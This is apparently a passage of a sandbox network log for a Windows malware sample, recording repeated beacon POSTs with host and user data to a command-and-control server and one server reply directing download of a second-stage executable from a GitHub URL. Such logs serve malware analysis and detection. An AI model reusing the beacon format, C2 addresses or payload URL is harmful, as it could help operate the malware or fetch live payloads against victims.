                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:22.377880096 CEST3441INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              48192.168.2.44982280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:22.723931074 CEST3441OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:22.908207893 CEST3442INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              49192.168.2.44982380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:23.851394892 CEST3442OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:24.035742044 CEST3443INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              5192.168.2.449758172.67.152.23080C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:53:21.494254112 CEST1052OUTGET /760 HTTP/1.1
                                                                              Host: north.ac
                                                                              Connection: Keep-Alive
                                                                              Jun 2, 2022 01:53:21.542336941 CEST1053INHTTP/1.1 301 Moved Permanently
                                                                              Date: Wed, 01 Jun 2022 23:53:21 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 02 Jun 2022 00:53:21 GMT
                                                                              Location: https://north.ac/760
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5YLW5dSqbg721IyKzsMf8P7ACjFZmvOi7AD%2FHAT86P9JYund1hvlywYDApRVqbaEC3kwr2hXCnVcLy7UQqMhYU0HKDAFEY5JZfIpWhl8H%2BfLoRglq5Ys9Kl1Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 714bde456979e68c-LHR
                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              50192.168.2.44982480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:26.976248980 CEST3443OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:27.155880928 CEST3444INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              51192.168.2.44982580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:27.778292894 CEST3444OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:27.957964897 CEST3444INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              52192.168.2.44982680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:28.377083063 CEST3445OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:28.559840918 CEST3445INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:28 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              53192.168.2.44982780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:28.893296003 CEST3446OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:29.072504997 CEST3446INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              54192.168.2.44982880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:29.678179026 CEST3447OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:29.862505913 CEST3447INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              55192.168.2.44982980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:30.271644115 CEST3448OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:30.455723047 CEST3448INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:30 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              56192.168.2.44983080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:30.708453894 CEST3449OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:30.890086889 CEST3449INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:30 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              57192.168.2.44983180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:31.147058964 CEST3450OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:31.328547001 CEST3450INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:31 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              58192.168.2.44983280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:31.829694033 CEST3451OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:32.013287067 CEST3451INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:31 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              59192.168.2.44983380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:32.459145069 CEST3452OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:32.644280910 CEST3452INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:32 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              6192.168.2.44976480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:53:40.683010101 CEST1547OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:53:40.865782022 CEST1548INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:53:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 34 61 0d 0a 3c 63 3e 31 30 30 30 30 30 37 30 30 31 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 69 71 6f 70 73 2f 61 6a 61 6a 61 6a 2f 72 61 77 2f 6d 61 69 6e 2f 66 69 6c 65 5f 32 32 36 31 33 2e 65 78 65 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 4a<c>1000007001https://github.com/neiqops/ajajaj/raw/main/file_22613.exe#<d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              60192.168.2.44983480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:32.993751049 CEST3453OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:33.174819946 CEST3453INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              61192.168.2.44983580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:33.554230928 CEST3453OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:33.734493971 CEST3454INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              62192.168.2.44983680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:34.112032890 CEST3454OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:34.293441057 CEST3455INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              63192.168.2.44983780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:34.756139994 CEST3455OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:34.938349962 CEST3456INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              64192.168.2.44983880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:35.308939934 CEST3456OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:35.491517067 CEST3457INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              65192.168.2.44983980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:35.815421104 CEST3457OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
